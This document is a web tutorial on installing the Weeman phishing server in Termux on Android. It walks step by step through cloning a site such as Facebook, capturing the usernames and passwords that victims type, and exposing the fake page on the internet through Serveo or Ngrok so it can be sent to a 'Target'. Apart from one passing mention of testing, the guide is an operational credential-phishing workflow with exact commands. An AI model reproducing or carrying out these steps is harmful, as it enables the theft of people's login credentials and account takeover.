Weeman is a simple yet powerful Python-based HTTP server script designed for phishing. It can create phishing pages that work on your local network or even the internet. In simple terms, Weeman captures login credentials like usernames and passwords when users enter them on the phishing page, displaying the details directly in the terminal.
In this tutorial, we’ll guide you step by step on how to set up and use Weeman in Termux. You’ll learn how to create phishing pages and make them accessible online or keep them limited to localhost. Let’s get started!
How to Install Weeman in Termux
Installing Weeman in Termux is a straightforward process. Follow these steps carefully to set up Weeman on your Android device using Termux.
-
Start by updating and upgrading the Termux packages to ensure your
environment is up-to-date. This step is crucial to avoid compatibility
issues when installing new tools. Use the following command:
apt update && apt upgrade -
Install Git, a version control system that allows you to clone repositories
from GitHub. Git is essential for downloading the Weeman tool. Run this
command to install Git in Termux:
pkg install git -
Clone the Weeman tool from its official GitHub repository. This repository
contains all the files needed to run the tool. Use the following command:
git clone https://github.com/evait-security/weeman.git -
Navigate into the Weeman directory, which contains the tool's files. This
command changes your current working directory to the folder where Weeman is
downloaded:
cd weeman -
Install Python 2, as Weeman is built to work with this version. Termux does
not include Python 2 by default, so you'll need to install it using this
command:
pkg install python2
That's it! You’ve now installed Weeman in Termux and are ready to use it for creating phishing pages and testing cybersecurity setups.
How to Use Weeman in Termux
Now that Weeman is installed, it’s time to learn how to use it. Weeman is a straightforward tool for creating phishing pages. Follow these steps to configure and use Weeman effectively.
Step 1: Launch Weeman
In the Weeman directory start Weeman by typing the following command:
python2 weeman.pyThe Weeman interface will load, and you’ll see a prompt where you can start entering commands.
Step 2: Check Available Commands
To get familiar with Weeman’s features, type the following command to view the help menu:
helpThe help menu lists all the available commands, making it easier to understand how Weeman works.
Step 3: Set the Target Website URL
To create a phishing page, you need to specify the target website. For example, if you want to clone Facebook, use this command:
set url https://facebook.com
Replace https://facebook.com with the URL of the website you want
to clone.
Step 4: Set the Port
Next, set the port for the phishing page. The default port is
8080, but you can choose a different port if needed:
set port 8080
Step 5: Set the Action URL
The action URL determines where the user’s login details will be sent. To mimic the target website, set the action URL as the same as the target URL:
set action_url https://facebook.com
Replace https://facebook.com with the URL of the website you’re
cloning.
Step 6: Start the Server
Once everything is configured, start the phishing server by typing:
run
The phishing page will now be hosted on your localhost. You can access it by opening your browser and visiting:
http://localhost:8080http://127.0.0.1:8080
You’ll see a cloned version of the target website.
Try entering a test username and password on the phishing page. The credentials will be captured and displayed in the Weeman terminal.
Now you know how to use Weeman to create a phishing page! In the next section, we’ll explain how to make your phishing page accessible over the internet using port forwarding.
How to Make the Phishing Page Accessible on the Internet
By default, the phishing page created by Weeman is only accessible on your local network (localhost). To make it accessible to others over the internet and send it to your Target, you need to use port forwarding. In this guide, we’ll show you how to do it using Serveo and Ngrok.
Method 1: Using Serveo for Port Forwarding
Step 1: Install OpenSSH
Serveo requires OpenSSH to work. To install open new session in Termux and type:
pkg install opensshStep 2: Start Port Forwarding with Serveo
Run the following command to forward your local phishing page to the internet:
ssh -R customname:80:localhost:8080 serveo.net-
Replace
customnamewith any name of your choice. This will become part of the public URL (e.g.,https://customname.serveo.net). -
If you used a different port in Weeman (e.g., 4444), replace
8080with that port number.
Step 3: Get the Public URL
After running the command, Serveo will generate a link similar to
https://customname.serveo.net. You can share this link with
others to access your phishing page online.
Method 2: Using Ngrok for Port Forwarding
Alternatively, you can use Ngrok for port forwarding. Here's how:
Step 1: Install Ngrok in Termux
Download and set up Ngrok by following the steps in this guide.
Step 2: Start Ngrok
Run the following command to forward port 8080:
./ngrok http 8080Step 3: Get the Public URL
Ngrok will generate a link like https://randomstring.ngrok.io.
Share this link to make your phishing page accessible online.
Once your page is live, open the Serveo or Ngrok link in a browser. You should see the cloned phishing page you created with Weeman. Test the page by entering a username and password. The captured credentials will be displayed in the Weeman terminal.
Did this guide help you? Have any questions or suggestions? We’d love to hear from you! Leave a comment below to share your thoughts or ask for assistance.
Your feedback helps us improve and create more helpful tutorials. Don’t hesitate to join the conversation!
